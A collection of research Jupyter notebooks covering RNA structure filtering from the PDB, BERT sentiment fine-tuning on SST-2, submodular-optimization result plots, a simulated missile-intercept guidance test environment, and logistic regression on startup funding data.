return json_from_url(request_url + '/' + pdb_id + '/' + chain_id)
# Fetch abstract title from pubmed
def pdb_id_contains_excluded_words(pdb_id, excluded_words):
pubmed_json = get_pdb_pubmed(pdb_id)
if pubmed_json is not None and 'rcsb_pubmed_abstract_text' in pubmed_json:
abstract = pubmed_json['rcsb_pubmed_abstract_text'].lower()
return any(excluded_word.lower() in abstract for excluded_word in excluded_words)
else: return False
# Checks that the polymer is of type RNA and DOES NOT contain DNA, oligosaccharide, or protein.
def contains_rna_only(entry):
return entry['rcsb_entry_info']['polymer_composition'] == 'RNA' and entry['rcsb_entry_info']['na_polymer_entity_types'] == 'RNA (only)'
# Checks if it contains any nonpolymer (either ligands or ions)
# TODO: Ions should be permitted while ligands should not be. Temp action is excluding both.
def contains_nonpolymer(entry):
return entry['rcsb_entry_info']['nonpolymer_entity_count'] > 0
# Retrieve chemical name from CompID (e.g water)
def get_name_from_comp_id(comp_id):
return get_pdb_chemcomp(comp_id)['chem_comp']['name']
# Retrieve list of Comp ID from chain (e.g OHO)
def comp_id_from_pdb_and_nonpolymer_id(pdb_id, nonpolymer_id):
return get_pdb_nonpolymer(pdb_id, nonpolymer_id)['pdbx_entity_nonpoly']['comp_id']
# Retrieve chemical name from CompID (e.g water)
def comp_name_from_pdb_and_nonpolymer_id(pdb_id, nonpolymer_id):
return get_pdb_nonpolymer(pdb_id, nonpolymer_id)['pdbx_entity_nonpoly']['name']
# Retrieve list of chain ids from entry.
def get_list_of_chain_id(entry):
return entry['rcsb_entry_container_identifiers']['polymer_entity_ids']
# Retrieve list of chain ids from entry.
def get_entry_title(entry):
return entry['struct']['title']
# Retrieve list of nonpolymer ids from entry.
def get_list_of_nonpolymer_id(entry):
entry_identifiers = entry['rcsb_entry_container_identifiers']
if 'non_polymer_entity_ids' in entry_identifiers: return entry_identifiers['non_polymer_entity_ids']
else: return
# Exclude ions and return list of ligands:
def nonpolymers_with_no_ions(list_of_nonpolymer_id):
list_of_nonpolymers = []
for nonpolymer_id in list_of_nonpolymer_id:
comp_id = comp_id_from_pdb_and_nonpolymer_id(pdb_id, nonpolymer_id)
if comp_id not in list_of_nonpolymers and comp_id not in explicit_ions:
list_of_nonpolymers.append(comp_id)
return list_of_nonpolymers
# Determine polymer length given entity.
def get_polymer_length(entity):
return entity['entity_poly']['rcsb_sample_sequence_length']
# + [markdown] id="EdYRcF4ULAe1"
# # Input direct URL (from BGSU), define nucleotides cutoffs, and specify exclusion words
# + colab={"base_uri": "https://localhost:8080/"} id="wBM2Sw4uEfZT" outputId="acfe600c-0916-4eca-d830-38e4d8b0c58a"
# Ask URL to CSV and then create dataframe from .csv
# E.g. http://rna.bgsu.edu/rna3dhub/nrlist/download/3.180/3.0A/csv
csv_url = input('Please provide direct URL to desired CSV file found on rna.bgsu.edu: ')
data = pd.read_csv(csv_url, usecols=[1])
# + colab={"base_uri": "https://localhost:8080/"} id="3GMhBEYCnqgt" outputId="8a2d0bc2-a11d-4ad9-fb05-ced2b95e7f4b"
# Ask user for maximum nucleotides
nt_max_cutoff = int(input("What should the maximium number (non-inclusive) of ribonucleotides be? "))
# Ask user for minimum nucleotides
nt_min_cutoff = int(input("What should the minimum number (non-inclusive) of ribonucleotides be? "))
# Ask user for if they would like to exclude any words from the PubMed abstract
excluded_words = input("List any words that you want to blacklist in the PubMed abstract. Separate words by space: ").split()
# + [markdown] id="UuW0TKebhfjc"
# # Extract PDB IDs from BGSU Spreadsheet
# + id="NneZmoDx66OU"
# Extract all PDB IDs of non-redundant RNAs from BGSU spreadsheet
bgsu_pdb_ids = []
for i, row in data.iterrows():
pdb_id = row[0].split('|')[0]
bgsu_pdb_ids.append(pdb_id)
# + id="68Cd8d1J3jOL"
def pdb_info_from_entry(entry):
# Check if of type RNA (no carbohydrate or protein) and if it is not excluded.
# Immediately skip entry if it contains the word tRNA or other excluded words
if contains_rna_only(entry) and not pdb_id_contains_excluded_words(pdb_id, excluded_words):
# Get list of Chain IDs for given PDB entry
list_of_chain_id = get_list_of_chain_id(entry)
# Loop through each chain ID to get length
for chain_id in list_of_chain_id:
entity = get_pdb_entity(pdb_id, chain_id)
length = get_polymer_length(entity)
# Checks if chain meets min/max threshold
if nt_min_cutoff < length < nt_max_cutoff:
# Fetch list of all nonpolymer IDs
list_of_nonpolymer_id = get_list_of_nonpolymer_id(entry)
if list_of_nonpolymer_id is not None:
# Remove instances of ions. We want only the ligands
ligands = nonpolymers_with_no_ions(list_of_nonpolymer_id)
if not ligands: ligands = ['Apo'] # If no ligands found, we will call these 'Apo'
else:
ligands = ['None'] # If no ions or ligands, we will call these 'None'
# Make list of requested info (pdb_id, chain_id, length, and list_of_nonpolymers)
list_of_nonpolymers = [pdb_id, chain_id, get_entry_title(entry), length, ligands]
return list_of_nonpolymers
else:
return
# + [markdown] id="rLKYoYH05BZ3"
# # Filter all RNAs based on max/min nt cutoffs.
# Includes nonpolymers (ions/ligands). Excludes carbohydrates and proteins.
# + colab={"base_uri": "https://localhost:8080/", "height": 476} id="F2CrK3x25Ac3" outputId="2f35d739-d184-4f59-b856-c0af1d39578e"
# Whitelist any PDB IDs that does not meet criteria or isn't found in BGSU spreadsheet.
# E.g. 4KQY 4QK8 5V3I 4P8Z 1GID
whitelist_pdb_ids = input("Please list any additional PDB IDs for which you want to include. Separate words by space: ").split()
matched_pdb_ids = bgsu_pdb_ids + whitelist_pdb_ids
benchmark_pdb_entries = []
# Loop through desired PDB IDs and if it meets criteria, add it.
for pdb_id in matched_pdb_ids:
entry = get_pdb_entry(pdb_id)
# Retrieve all info needed from PDB (including name, description length, ligand)
pdb_info = pdb_info_from_entry(entry)
if pdb_info is not None: benchmark_pdb_entries.append(pdb_info)
# Print number of RNAs found
print()
print('Found ', len(benchmark_pdb_entries), ' molecules:')
# Take list and create DataFrame
df = pd.DataFrame(benchmark_pdb_entries, columns = ["PDB ID", "Chain_ID", "Description", "Length (bp)", "Ligand (non-ion)"])
df
# + [markdown] id="wOjRQt4Oh41e"
# # Export dataframe to CSV
# + id="CveWaL4Qh5I5" colab={"base_uri": "https://localhost:8080/", "height": 167} outputId="737610b3-17df-4966-e459-40d7c36a7ff3"
df.to_excel('Benchmark_RNAs' + '_' + str(nt_min_cutoff) + '_to_' + str(nt_max_cutoff) + '_nts' + '.xlsx', index=False)
# + [markdown] id="BwkkwcptK0Hv"
# **Helper function to determine list of ligands present in BGSU dataset:**
# + colab={"base_uri": "https://localhost:8080/"} id="DHKDksWUy91X" outputId="597025f1-20f1-4ea1-c1b2-a93ab1f3d98f"
list_of_nonpolymer_id = []
list_of_nonpolymers = {}
for pdb_id in matching_pdb_ids:
entry = get_pdb_entry(pdb_id)
list_of_nonpolymer_id = get_list_of_nonpolymer_id(entry)
for nonpolymer_id in list_of_nonpolymer_id:
comp_id = comp_id_from_pdb_and_nonpolymer_id(pdb_id, nonpolymer_id)
comp_name = comp_name_from_pdb_and_nonpolymer_id(pdb_id, nonpolymer_id)
if comp_id not in list_of_nonpolymers:
list_of_nonpolymers[comp_id] = comp_name
# Print number of RNAs found
print()
print('Found ', len(list_of_nonpolymers), ' nonpolymers')
print(list_of_nonpolymers)
# + id="qtal4IDRuZm1"
# + [markdown] id="291a1H9bT2-_"
# **Manual Search to see if PDB ID matches criteria**
# + id="X2TE0ilsMqb9"
# Determine if a certain PDB ID passes all criteria.
pdb_id = input('Please type the PDB ID you want to search: ')
print()
entry = get_pdb_entry(pdb_id)
print('Contains RNA only: ', contains_rna_only(entry))
print('Contains excluded words (tRNA): ', pdb_id_contains_excluded_words(pdb_id, excluded_words))
list_of_chain_id = get_list_of_chain_id(entry)
for chain_id in list_of_chain_id:
entity = get_pdb_entity(pdb_id, chain_id)
print('Chain', chain_id, 'contains desired nt range:', nt_min_cutoff < get_polymer_length(entity) < nt_max_cutoff, "because it is", get_polymer_length(entity), "nt long")
print(entry)
|
FindRepresentativeRNAChains_Phillip.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: 'Python 3.7.6 64-bit (''rapids'': conda)'
# language: python
# name: python37664bitrapidsconda05ea436670824d2ebed703c8c53b011e
# ---
# +
import dataclasses
from pathlib import Path
import nlp
import torch
import numpy as np
from transformers import BertTokenizerFast
from transformers import BertForSequenceClassification
from torch.optim.lr_scheduler import CosineAnnealingLR
from sklearn.model_selection import train_test_split
try:
from apex import amp
APEX_AVAILABLE = True
except ModuleNotFoundError:
APEX_AVAILABLE = False
from pytorch_helper_bot import (
BaseBot, MovingAverageStatsTrackerCallback, CheckpointCallback,
LearningRateSchedulerCallback, MultiStageScheduler, Top1Accuracy,
LinearLR
)
# -
CACHE_DIR = Path("../cache/")
CACHE_DIR.mkdir(exist_ok=True)
# Reference:
#
# * https://github.com/huggingface/nlp/blob/master/notebooks/Overview.ipynb
dataset = nlp.load_dataset('glue', "sst2")
set([x['label'] for x in dataset["train"]])
tokenizer = BertTokenizerFast.from_pretrained('bert-base-uncased')
# Tokenize our training dataset
def convert_to_features(example_batch):
# Tokenize contexts and questions (as pairs of inputs)
encodings = tokenizer.batch_encode_plus(example_batch['sentence'], pad_to_max_length=True, max_length=64)
return encodings
# Format our dataset to outputs torch.Tensor to train a pytorch model
columns = ['input_ids', 'token_type_ids', 'attention_mask', "label"]
for subset in ("train", "validation"):
dataset[subset] = dataset[subset].map(convert_to_features, batched=True)
dataset[subset].set_format(type='torch', columns=columns)
tokenizer.decode(dataset['train'][6]["input_ids"].numpy())
dataset['train'][0]["attention_mask"]
class SST2Dataset(torch.utils.data.Dataset):
def __init__(self, entries_dict):
super().__init__()
self.entries_dict = entries_dict
def __len__(self):
return len(self.entries_dict["label"])
def __getitem__(self, idx):
return (
self.entries_dict["input_ids"][idx],
self.entries_dict["attention_mask"][idx],
self.entries_dict["token_type_ids"][idx],
self.entries_dict["label"][idx]
)
valid_idx, test_idx = train_test_split(list(range(len(dataset["validation"]))), test_size=0.5, random_state=42)
train_dict = {
"input_ids": dataset['train']["input_ids"],
"attention_mask": dataset['train']["attention_mask"],
"token_type_ids": dataset['train']["token_type_ids"],
"label": dataset['train']["label"]
}
valid_dict = {
"input_ids": dataset['validation']["input_ids"][valid_idx],
"attention_mask": dataset['validation']["attention_mask"][valid_idx],
"token_type_ids": dataset['validation']["token_type_ids"][valid_idx],
"label": dataset['validation']["label"][valid_idx]
}
test_dict = {
"input_ids": dataset['validation']["input_ids"][test_idx],
"attention_mask": dataset['validation']["attention_mask"][test_idx],
"token_type_ids": dataset['validation']["token_type_ids"][test_idx],
"label": dataset['validation']["label"][test_idx]
}
# Instantiate a PyTorch Dataloader around our dataset
train_loader = torch.utils.data.DataLoader(SST2Dataset(train_dict), batch_size=32, shuffle=True)
valid_loader = torch.utils.data.DataLoader(SST2Dataset(valid_dict), batch_size=32, drop_last=False)
test_loader = torch.utils.data.DataLoader(SST2Dataset(test_dict), batch_size=32, drop_last=False)
@dataclasses.dataclass
class SST2Bot(BaseBot):
log_dir = CACHE_DIR / "logs"
def __post_init__(self):
super().__post_init__()
self.loss_format = "%.6f"
@staticmethod
def extract_prediction(output):
return output[0]
model = BertForSequenceClassification.from_pretrained('bert-base-uncased').cuda()
# +
# torch.nn.init.kaiming_normal_(model.classifier.weight)
# torch.nn.init.constant_(model.classifier.bias, 0)
# torch.nn.init.kaiming_normal_(model.bert.pooler.dense.weight)
# torch.nn.init.constant_(model.bert.pooler.dense.bias, 0);
# -
optimizer = torch.optim.Adam(model.parameters(), lr=2e-5)
if APEX_AVAILABLE:
model, optimizer = amp.initialize(
model, optimizer, opt_level="O1"
)
# +
total_steps = len(train_loader) * 3
checkpoints = CheckpointCallback(
keep_n_checkpoints=1,
checkpoint_dir=CACHE_DIR / "model_cache/",
monitor_metric="accuracy"
)
lr_durations = [
int(total_steps*0.2),
int(np.ceil(total_steps*0.8))
]
break_points = [0] + list(np.cumsum(lr_durations))[:-1]
callbacks = [
MovingAverageStatsTrackerCallback(
avg_window=len(train_loader) // 8,
log_interval=len(train_loader) // 10
),
LearningRateSchedulerCallback(
MultiStageScheduler(
[
LinearLR(optimizer, 0.01, lr_durations[0]),
CosineAnnealingLR(optimizer, lr_durations[1])
],
start_at_epochs=break_points
)
),
checkpoints
]
bot = SST2Bot(
model=model,
train_loader=train_loader,
valid_loader=valid_loader,
clip_grad=10.,
optimizer=optimizer, echo=True,
criterion=torch.nn.CrossEntropyLoss(),
callbacks=callbacks,
pbar=False, use_tensorboard=False,
use_amp=APEX_AVAILABLE,
metrics=(Top1Accuracy(),)
)
# -
print(total_steps)
bot.train(
total_steps=total_steps,
checkpoint_interval=len(train_loader) // 2
)
bot.load_model(checkpoints.best_performers[0][1])
checkpoints.remove_checkpoints(keep=0)
TARGET_DIR = CACHE_DIR / "sst2_bert_uncased"
TARGET_DIR.mkdir(exist_ok=True)
bot.model.save_pretrained(TARGET_DIR)
bot.eval(valid_loader)
bot.eval(test_loader)
tokenizer.pad_token_id
|
notebooks/01-2-BERT-sst2-split-dev.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ### Import packages
# +
# %matplotlib inline
import matplotlib
import matplotlib.pyplot as plt
import os
import sys
import dill
import yaml
import numpy as np
import pandas as pd
import ast
import seaborn as sns
sns.set(style='ticks')
# -
# ### Import submodular-optimization packages
sys.path.insert(0, "/Users/smnikolakaki/GitHub/submodular-linear-cost-maximization/submodular_optimization/")
# ### Visualizations directory
VIZ_DIR = os.path.abspath("/Users/smnikolakaki/GitHub/submodular-linear-cost-maximization/submodular_optimization/viz/")
# ### Plotting utilities
def set_style():
# This sets reasonable defaults for font size for a paper
sns.set_context("paper")
# Set the font to be serif
sns.set(font='serif')#, rc={'text.usetex' : True})
# Make the background white, and specify the specific font family
sns.set_style("white", {
"font.family": "serif",
"font.serif": ["Times", "Palatino", "serif"]
})
# Set tick size for axes
sns.set_style("ticks", {"xtick.major.size": 6, "ytick.major.size": 6})
def set_size(fig, width=6, height=4):
fig.set_size_inches(width, height)
plt.tight_layout()
def save_fig(fig, filename):
fig.savefig(os.path.join(VIZ_DIR, filename), dpi=600, format='pdf', bbox_inches='tight')
# ### Plots
# +
df = pd.read_csv("/Users/smnikolakaki/GitHub/submodular-linear-cost-maximization/jupyter/experiment_00.csv",
header=0,
index_col=False)
df.columns = ['Algorithm', 'sol', 'val', 'submodular_val', 'cost', 'runtime', 'lazy_epsilon',
'sample_epsilon','user_sample_ratio','scaling_factor','num_rare_skills','num_common_skills',
'num_popular_skills','num_sampled_skills','seed','k']
# -
# #### Details
# Original marginal gain: $$g(e|S) = f(e|S) - w(e)$$
# Scaled marginal gain: $$\tilde{g}(e|S) = f(e|S) - 2w(e)$$
# Distorted marginal gain: $$\tilde{g}(e|S) = (1-\frac{\gamma}{n})^{n-(i+1)}f(e|S) - w(e)$$
#
# #### Algorithms:
# 1. Cost Scaled Greedy: The algorithm performs iterations i = 0,...,n-1. In each iteration the algorithm selects the element that maximizes the scaled marginal gain. It adds the element to the solution if the original marginal gain of the element is >= 0. The algorithm returns a solution S: f(S) - w(S) >= (1/2)f(OPT) - w(OPT). The running time is O($n^2$).
#
#
# 2. Cost Scaled Exact Lazy Greedy: The algorithm first initializes a max heap with all the elements. The key of each element is its scaled marginal gain and the value is the element id. If the scaled marginal gain of an element is < 0 the algorithm discards the element and never inserts it in the heap. Then, for 0,...,n-1 iterations the algorithm does the following: (i) pops the top element from the heap and computes its new scaled marginal gain, (ii) It checks the old scaled marginal gain of the next element in the heap, (iii) if the popped element's new scaled marginal gain is >= the next elements's old gain we return the popped element, otherwise if its new scaled marginal gain is >= 0 we reinsert the element to the heap and repeat step iii, otherwise we discard it and repeat step iii, (iv) if the returned element's original marginal gain is >= 0 we add it to the solution. The algorithm returns a solution S: f(S) - w(S) >= (1/2)f(OPT) - w(OPT). The running time is O($n^2$).
#
#
# 3. Unconstrained Linear: The algorithm performs i = 0,...,n-1 iterations (one for each arriving element). For each element it adds it to the solution if its scaled marginal gain is > 0. The algorithm returns a solution S: f(S) - w(S) >= (1/2)f(OPT) - w(OPT). The running time is O($n$).
#
#
# 4. Distorted Greedy: The algorithm performs i = 0,...,n-1 iterations. In each iteration the algorithm selects the element that maximizes the distorted marginal gain. It adds the element to the solution if the distorted marginal gain of the element is > 0. The algorithm returns a solution S: f(S) - w(S) >= (1-1/e)f(OPT) - w(OPT). The running time is O($n^2$). The algorithmic implementation is based on Algorithm 1 found [here](https://arxiv.org/pdf/1904.09354.pdf) for k=n.
#
#
# 5. Stochastic Distorted Greedy: The algorithm performs i = 0,...,n-1 iterations. In each iteration the algorithm chooses a sample of s=log(1/ε) elements uniformly and independently and from this sample it selects the element that maximizes the distorted marginal gain. It adds the element to the solution if the distorted marginal gain of the element is > 0. We set $ε=0.01$. The algorithm returns a solution S: E[f(S) - w(S)] >= (1-1/e-ε)f(OPT) - w(OPT). The running time is O($n\log{1/ε}$). The algorithmic implementation is based on Algorithm 2 found [here](https://arxiv.org/pdf/1904.09354.pdf) for k=n.
#
#
# 6. Unconstrained Distorted Greedy: The algorithm performs i = 0,...,n-1 iterations. In each iteration the algorithm chooses a random single element uniformly. It adds the element to the solution if the distorted marginal gain of the element is > 0. The algorithm returns a solution S: E[f(S) - w(S)] >= (1-1/e)f(OPT) - w(OPT). The running time is O($n$).
# #### Performance comparison
def plot_performance_comparison(df):
ax = sns.lineplot(x='user_sample_ratio', y='val', data=df, hue='Algorithm', ci='sd')
plt.xlabel('User sample size (% of total users)')
plt.ylabel('Value of objective function')
plt.title('Performance comparison')
fig = plt.gcf()
ax = plt.gca()
return fig, ax
# +
df = df[(df.Algorithm == 'distorted_greedy')
|(df.Algorithm == 'cost_scaled_greedy')
|(df.Algorithm == 'cost_scaled_lazy_exact_greedy')
|(df.Algorithm == 'unconstrained_linear')
|(df.Algorithm == 'unconstrained_distorted_greedy')
|(df.Algorithm == 'stochastic_distorted_greedy')
]
df0 = df[(df['sample_epsilon'].isnull()) | (df['sample_epsilon'] == 0.01)]
set_style()
fig, axes = plot_performance_comparison(df0)
set_size(fig, 10, 8)
# -
# #### Runtime comparison for different dataset sizes
def plot_performance_comparison(df):
ax = sns.lineplot(x='user_sample_ratio', y='runtime', data=df, hue='Algorithm', ci='sd')
plt.xlabel('User sample size (% of total users)')
plt.ylabel('Time (sec)')
plt.title('Performance comparison')
# plt.yscale('log')
fig = plt.gcf()
ax = plt.gca()
return fig, ax
df = df[(df.Algorithm == 'distorted_greedy')
|(df.Algorithm == 'cost_scaled_greedy')
|(df.Algorithm == 'cost_scaled_lazy_exact_greedy')
|(df.Algorithm == 'unconstrained_linear')
|(df.Algorithm == 'unconstrained_distorted_greedy')
|(df.Algorithm == 'stochastic_distorted_greedy')
]
df0 = df[(df['sample_epsilon'].isnull()) | (df['sample_epsilon'] == 0.01)]
set_style()
fig, axes = plot_performance_comparison(df0)
set_size(fig, 10, 8)
|
jupyter/.ipynb_checkpoints/Experiment_unconstrained_problem-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import os,sys
sys.path.append('../../../RL_lib/Agents')
sys.path.append('../../../RL_lib/Policies/PPO')
sys.path.append('../../../RL_lib/Policies/Common')
sys.path.append('../../../RL_lib/Utils')
sys.path.append('../../Env')
sys.path.append('../../Imaging')
# %load_ext autoreload
# %load_ext autoreload
# %autoreload 2
# %matplotlib nbagg
import os
print(os.getcwd())
# + language="html"
# <style>
# .output_wrapper, .output {
# height:auto !important;
# max-height:1000px; /* your desired max-height here */
# }
# .output_scroll {
# box-shadow:none !important;
# webkit-box-shadow:none !important;
# }
# </style>
# -
# # Optimize Policy
# +
from env import Env
import env_utils as envu
from reward_sensor_gaussian_of import Reward
import attitude_utils as attu
from missile import Missile
from target import Target
from missile_icgen import Missile_icgen
from target_icgen import Target_icgen
from dynamics_model_3dof import Dynamics_model_3dof as Target_dynamics_model
from dynamics_model_6dof import Dynamics_model_6dof as Missile_dynamics_model
from bangbang_policy_ra import BangBang_policy as Target_policy
from no_att_constraint import No_att_constraint
from no_w_constraint import No_w_constraint
######### RL vs PN ###########
is_RL = False
########## RL ###########
import rl_utils
from arch_policy_vf import Arch
import policy_nets as policy_nets
import valfunc_nets as vf_nets
from agent import Agent
from value_function import Value_function
if is_RL:
from policy import Policy
from softmax_pd import Softmax_pd as PD
else:
from zem_policy import ZEM_policy as Policy
######### Actuator Models #########
from actuator_model_ekv import Actuator_model_ekv as Missile_actuator_model
from actuator_model_3dof import Actuator_model_3dof as Target_actuator_model
######## Sensor ##############
from angle_sensor import Angle_sensor
from eo_model import EO_model
import optics_utils as optu
ap = attu.Quaternion_attitude()
offset=np.asarray([0,0])
C_cb = optu.rotate_optical_axis(0.0, np.pi/2, 0.0)
r_cb = np.asarray([0,0,0])
fov=np.pi-np.pi/8
cm = EO_model(attitude_parameterization=ap, C_cb=C_cb, r_cb=r_cb,
fov=fov, debug=False, p_x=96,p_y=96)
sensor = Angle_sensor(cm, attitude_parameterization=ap, use_range=True, ignore_fov_vio=not is_RL,
use_ideal_offset=False,
pool_type='max', state_type=Angle_sensor.optflow_state, optflow_scale=0.1)
########## Target ############
target_voffset = 10
target_max_acc = 5*9.81
target_max_acc_range = (0., target_max_acc)
target_dynamics_model = Target_dynamics_model(h=0.02,M=1e3)
target_actuator_model = Target_actuator_model(max_acc=target_max_acc)
target_policy = Target_policy(3,max_acc_range=target_max_acc_range,tf=80)
target = Target(target_policy, target_actuator_model, target_dynamics_model, attitude_parameterization=ap)
target_icgen = Target_icgen(attitude_parameterization=ap,
min_init_position=(0.0, 0.0, 50000.),
max_init_position=(0.0, 0.0, 50000.),
v_mag=(4000., 4000.),
v_theta=(envu.deg2rad(90-target_voffset), envu.deg2rad(90+target_voffset)),
v_phi=(envu.deg2rad(-target_voffset), envu.deg2rad(target_voffset)))
########## Missile #############
missile_roffset = 10
missile_mass = 50
missile_max_thrust = 10*9.81*missile_mass
missile_dynamics_model = Missile_dynamics_model(h=0.02,M=1e3)
missile_actuator_model = Missile_actuator_model(max_thrust=missile_max_thrust,pulsed=True)
missile = Missile(target, missile_actuator_model, missile_dynamics_model, sensor=sensor,
attitude_parameterization=ap,
w_constraint=No_w_constraint(), att_constraint=No_att_constraint(ap),
align_cv=False, debug_cv=False, perturb_pn_velocity=True)
if not is_RL:
missile.get_state_agent = missile.get_state_agent_PN_att
missile_icgen = Missile_icgen(attitude_parameterization=ap,
position_r=(50000.,55000.),
position_theta=(envu.deg2rad(90-missile_roffset),envu.deg2rad(90+missile_roffset)),
position_phi=(envu.deg2rad(-missile_roffset),envu.deg2rad(missile_roffset)),
mag_v=(3000,3000),
heading_error=(envu.deg2rad(0),envu.deg2rad(5)),
attitude_error=(0.0,0.0),
debug=False)
reward_object = Reward(debug=False, hit_coeff=10., tracking_coeff=1., tracking_sigma=0.10, optflow_sigma=0.004,
fuel_coeff=0.0, fov_coeff=-0., hit_rlimit=0.5)
logger = rl_utils.Logger()
env = Env(missile, target, missile_icgen, target_icgen, logger,
precision_range=1000., precision_scale=300, terminate_on_vc=not is_RL,
reward_object=reward_object, use_offset=False, debug_steps=True,
tf_limit=50.0,print_every=10,nav_period=0.06)
##########################################
recurrent_steps = 200
if is_RL:
obs_dim = 4
action_dim = 4
actions_per_dim = 2
logit_dim = action_dim * actions_per_dim
policy = Policy(policy_nets.GRU1(obs_dim, logit_dim, recurrent_steps=recurrent_steps),
PD(action_dim, actions_per_dim),
shuffle=False,
kl_targ=0.001,epochs=20, beta=0.1, servo_kl=True, max_grad_norm=30, scale_vector_obs=True,
init_func=rl_utils.xn_init)
else:
policy = Policy(ap=ap, N=3, max_acc=missile_max_thrust / missile_mass)
obs_dim = 19
act_dim = 4
arch = Arch()
value_function = Value_function(vf_nets.GRU1(obs_dim, recurrent_steps=recurrent_steps), scale_obs=True,
shuffle=False, batch_size=9999999, max_grad_norm=30,
verbose=False)
agent = Agent(arch, policy, value_function, None, env, logger,
policy_episodes=30, policy_steps=3000, gamma1=0.90, gamma2=0.995,
recurrent_steps=recurrent_steps, monitor=env.rl_stats)
if is_RL:
agent.train(300000)
# -
# # Test Policy
#
# +
env.test_policy_batch(agent,5000,print_every=100,test_mode=True)
# -
|
Experiments/Test_PN/Test_ZEM-nav=6.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
import seaborn as sb
import matplotlib.pyplot as plt
import sklearn
import arrow
import datetime as dt
from sklearn.utils import resample
from pylab import rcParams
from sklearn import preprocessing
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn import metrics
from sklearn import ensemble
from sklearn.metrics import classification_report, confusion_matrix, accuracy_score
# -
# %matplotlib inline
rcParams['figure.figsize'] = 10, 8
sb.set_style('whitegrid')
comp = pd.read_csv('comp_filter.csv')
comp
comp.info()
# convert '-' to NAN in comp['funding_total_usd']:
comp['funding_total_usd'] = pd.to_numeric(comp['funding_total_usd'], errors='coerce')
# select meaningful features
comp_data = comp[['name','funding_total_usd','country_code','funding_rounds',#'founded_at',
'first_funding_at','last_funding_at','category_1','label']]
comp_data.isnull().sum()
# filter out all the nan data
comp_data.dropna(inplace=True)
comp_data.isnull().sum()
comp_data['country_code']
comp_data.info()
# +
# comp_data.head(10)
# comp_data is a clean dataset and ready to use!!!
# -
label = sb.countplot(x='label',data=comp_data, palette='hls')
fig_ = label.get_figure()
fig_.savefig('label.png')
# # Baseline Model w/ Logistic Regression
#
# ## 1.1 Logistic Regression Model w/ only numerical features
# Only select the numerical data as features
logReg_data = comp_data[['funding_total_usd','funding_rounds','label']]
logReg_data.label.value_counts()[1]
# handling with the imbalance data problem
def balance(df):
# Separate majority and minority classes
df_majority = df[df.label==0]
df_minority = df[df.label==1]
# n is the number of minority class (label = 1)
n = df.label.value_counts()[1]
# # Upsample minority class
# df_minority_upsampled = resample(df_minority,
# replace=True, # sample with replacement
# n_samples=47312, # to match majority class
# random_state=123) # reproducible results
# downsample majority class
df_majority_downsampled = resample(df_majority,
replace=False, # sample with replacement
n_samples=n, # to match majority class
random_state=123) # reproducible results
# Combine majority class with upsampled minority class
# df_upsampled = pd.concat([df_majority, df_minority_upsampled])
df_downsampled = pd.concat([df_minority, df_majority_downsampled])
return df_downsampled
logReg_data_balanced = balance(logReg_data)
logReg_data_balanced.label.value_counts()
X = logReg_data_balanced.iloc[:,:-1]
y = logReg_data_balanced.iloc[:,-1]
# conduct the feature scaling/normalization
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=2)
scaler = sklearn.preprocessing.StandardScaler()
scaler.fit(X_train)
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)
LogReg = LogisticRegression()
LogReg.fit(X_train, y_train)
y_pred = LogReg.predict(X_test)
sum(y_pred)
accuracy_score(y_test, y_pred)
y_train_pred = LogReg.predict(X_train)
accuracy_score(y_train, y_train_pred)
# +
# X_train_ = np.clip(X_train, None, 5)
plt.plot(X_train[np.where(y_train == 1),0], X_train[np.where(y_train == 1),1], 'go')
#X_train_[np.where(y_train == 0),0], X_train_[np.where(y_train == 0),1], 'rx')
plt.plot(X_train[np.where(y_train == 0),0], X_train[np.where(y_train == 0),1], 'rx')
plt.savefig('LogReg_numOnly_train.png')
plt.show()
# -
# ## 1.2 Logistic Regression Model w/ all features
# load LogReg_data to preprocess the encoding and handle with the timestamp features
LogReg_data = comp_data.copy()
LogReg_data.info()
LogReg_data
# first balance the dataset
LogReg_data_balanced = balance(LogReg_data)
LogReg_data_balanced.info()
LogReg_data_balanced.loc[35632]
# +
# # Encode 'category' features, label them with values between 0 and n_classes-1
# df = LogReg_data_balanced
# col = 'category_1'
# le = preprocessing.LabelEncoder()
# col_label = le.fit_transform(list(df[col]))
# df[col + '_encode']= col_label #pd.Series(col_label)
# -
LogReg_data_balanced.loc[35632]
# Encode 'category' features, label them with values between 0 and n_classes-1
def encoder_cat(df, col):
le = preprocessing.LabelEncoder()
col_label = le.fit_transform(list(df[col]))
df[col]=col_label
return le
# encode text features
def encoder_text(df, col, min_df=10):
df[col] = df[col].astype(str)
vectorizer = CountVectorizer(min_df=min_df)
vectorizer.fit(df[col])
col_bag_of_words = vectorizer.transform(df[col])
return col_bag_of_words
# Only run once !!!
country_list = encoder_cat(LogReg_data_balanced, 'country_code')
category_list = encoder_cat(LogReg_data_balanced, 'category_1')
LogReg_data_balanced
country_list.classes_
category_list.classes_
# calculate the duration between 'first_funding_at' and 'last_funding_at'
t1 = pd.to_datetime(LogReg_data_balanced.first_funding_at, errors='coerce')
t1 = pd.to_timedelta(t1).dt.days
t2 = pd.to_datetime(LogReg_data_balanced.last_funding_at, errors='coerce')
t2 = pd.to_timedelta(t2).dt.days
LogReg_data_balanced['funding_duration'] = t2 - t1
LogReg_data_balanced.head()
X = LogReg_data_balanced[['funding_total_usd','funding_rounds','funding_duration','category_1','country_code']]
# plot the correlation between the features
corr = sb.heatmap(X.corr())
fig = corr.get_figure()
fig.savefig('corr.png')
X.info()
y = LogReg_data_balanced.label
X.values
from sklearn.preprocessing import OneHotEncoder
onehotencoder = OneHotEncoder(categorical_features = [-1, -2])
X = onehotencoder.fit_transform(X).toarray()
# split the dataset to training set and test set
